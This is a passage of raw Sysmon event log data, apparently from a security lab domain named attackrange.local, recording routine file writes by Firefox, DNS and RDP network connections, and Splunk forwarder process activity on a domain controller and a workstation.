Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F0F38DA28A88832B17B5700073A183A,SHA256=8041AD64BA212FA8608D97E48CA5D7A37531564920B420ED57FB9C05C142BE16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.807{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=B291AD81803C87DF795FD2D4B46F728C,SHA256=E30C60296F8C2538DE9194FEFEFC2E7BF645804CF341ED524C52CA0A98E89484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.807{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.791{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=23F92D6A4085DA3A049409C9EF6E6F24,SHA256=9F6D9C12BB68A8D0EE3F884519916D7F3D174C4F85BFE2BD208CE27A4D1E1D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.791{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.790{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=0E6406BCED06B69AEB6C8CA463C0EBAB,SHA256=884CCC1F3FAAB666B5DAE09256AD409EE961AC8E8EB0DF4B9144DF09CFDD0035,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:48.748{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:49.064{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=588B2AF42C3C29382F84D72CF27C6B54,SHA256=C7C3D990676C37C6273F7BA0F506FA7AAC3C99D8F4E44E4B894749EE5AA89034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.538{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.947{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64659- 354300x80000000000000001045600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.945{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62188- 354300x80000000000000001045599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.446{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-31405-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001045598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.022{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpsetMD5=4389884605AD56EC50BF27FBD4CFB473,SHA256=60B552CBA048738FE850BA958CDDF9B742B6FAA7519F455D4B39437734725990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstoreMD5=3F92B621E1581AD764BE2EC57381AF23,SHA256=18FBBA6D350213F61DF718195FD2B38A3B8344D0A5C22C2713E6F8944E9A9DD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpsetMD5=8D76E0D31A687AE5A730C71C052C68E8,SHA256=6747A2FB92023CBF27E345AAC38B2BA7695A7DC5E9A42BD793D0CF6DAEAED260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstoreMD5=DC7308A91A03C92D7329F37F15C7AC82,SHA256=180DDE904FFF036ABD4045A52850200ACA369E4577E14E0675E5298855A6AA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpsetMD5=54971F1ADD787A9676F9DEFAB4C7FE3F,SHA256=FD890E3920CDFB62C1089C6119A8F8B713F81BDDAF7BEC925AFB4BDFB32AF5E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstoreMD5=0A19E4A237D65FF069452EF5201F217E,SHA256=AC5D43328F28E2B1159D014197F58D987C2AB78C9179DCD924524353571FA604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-track-digest256.vlpsetMD5=D95F203FEE1C8FAE222EF4C6D410971B,SHA256=1CA57763647104AEF83C8A86E8366FBBEE4BAA88C900C7AF66F437720319CEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\social-track-digest256.sbstoreMD5=C0FE3CB314FDF424A4D4F1DE2801A4DF,SHA256=C4CA8CE5B3B8D038E3348887BDA7634D1949325BB95A68D17184D2A99F37E810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpsetMD5=8F1AF05E946BCD9711A1CDE1B1ED6C95,SHA256=0F5C8864E17307F3C8CE1D35AC4770D0C1C34F8CDB3FC7404F2114B4E0FD93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstoreMD5=B91E9842F81EE5668B68C0B5B561010A,SHA256=19F7DFB5FC8E587C8D48DC8A779B07E1C11CCD772A7B68025146FF0A335B54CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpsetMD5=FCC9C2C9B611A3264B68EBE180EB4248,SHA256=6ECD378A537EEFE350B45CFA353741383F407D99D776BF23155A7825DC5DD2BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstoreMD5=519BEB1B01FC355BB388F1F75BE997FD,SHA256=FFE2D3077B81AE6F51B220C1C661B276C823FA67DAD1D64FC5F17249FC54BDC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpsetMD5=6CBD94D3D2878BBE7EE0E707A97C3307,SHA256=F3B68CF7458532B88D77ECF652721AE743D4E7C60A8D44D16872158E66E9D903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=B291AD81803C87DF795FD2D4B46F728C,SHA256=E30C60296F8C2538DE9194FEFEFC2E7BF645804CF341ED524C52CA0A98E89484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:49.007{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Local\Mozilla\Firefox\Profiles\bnjry9g4.default-release\safebrowsing-updating\google4\goog-phish-proto.vlpsetMD5=1D05EADF8B5987C12351E95499404B05,SHA256=1E4CD89907C8B6E7314B8D0267A44347017F93A61A13548402B10B4F5EA1FB4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.869{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.854{466BC892-F27A-60EB-DE7C-00000000CF01}10108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001045613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.453{466BC892-F27A-60EB-DD7C-00000000CF01}48489928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001045612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.948{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\bobtcptruefalse10.0.1.14win-dc-890.attackrange.local50883-false172.217.16.138zrh04s06-in-f138.1e100.net443https 10341000x80000000000000001045611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27A-60EB-DD7C-00000000CF01}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:50.190{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 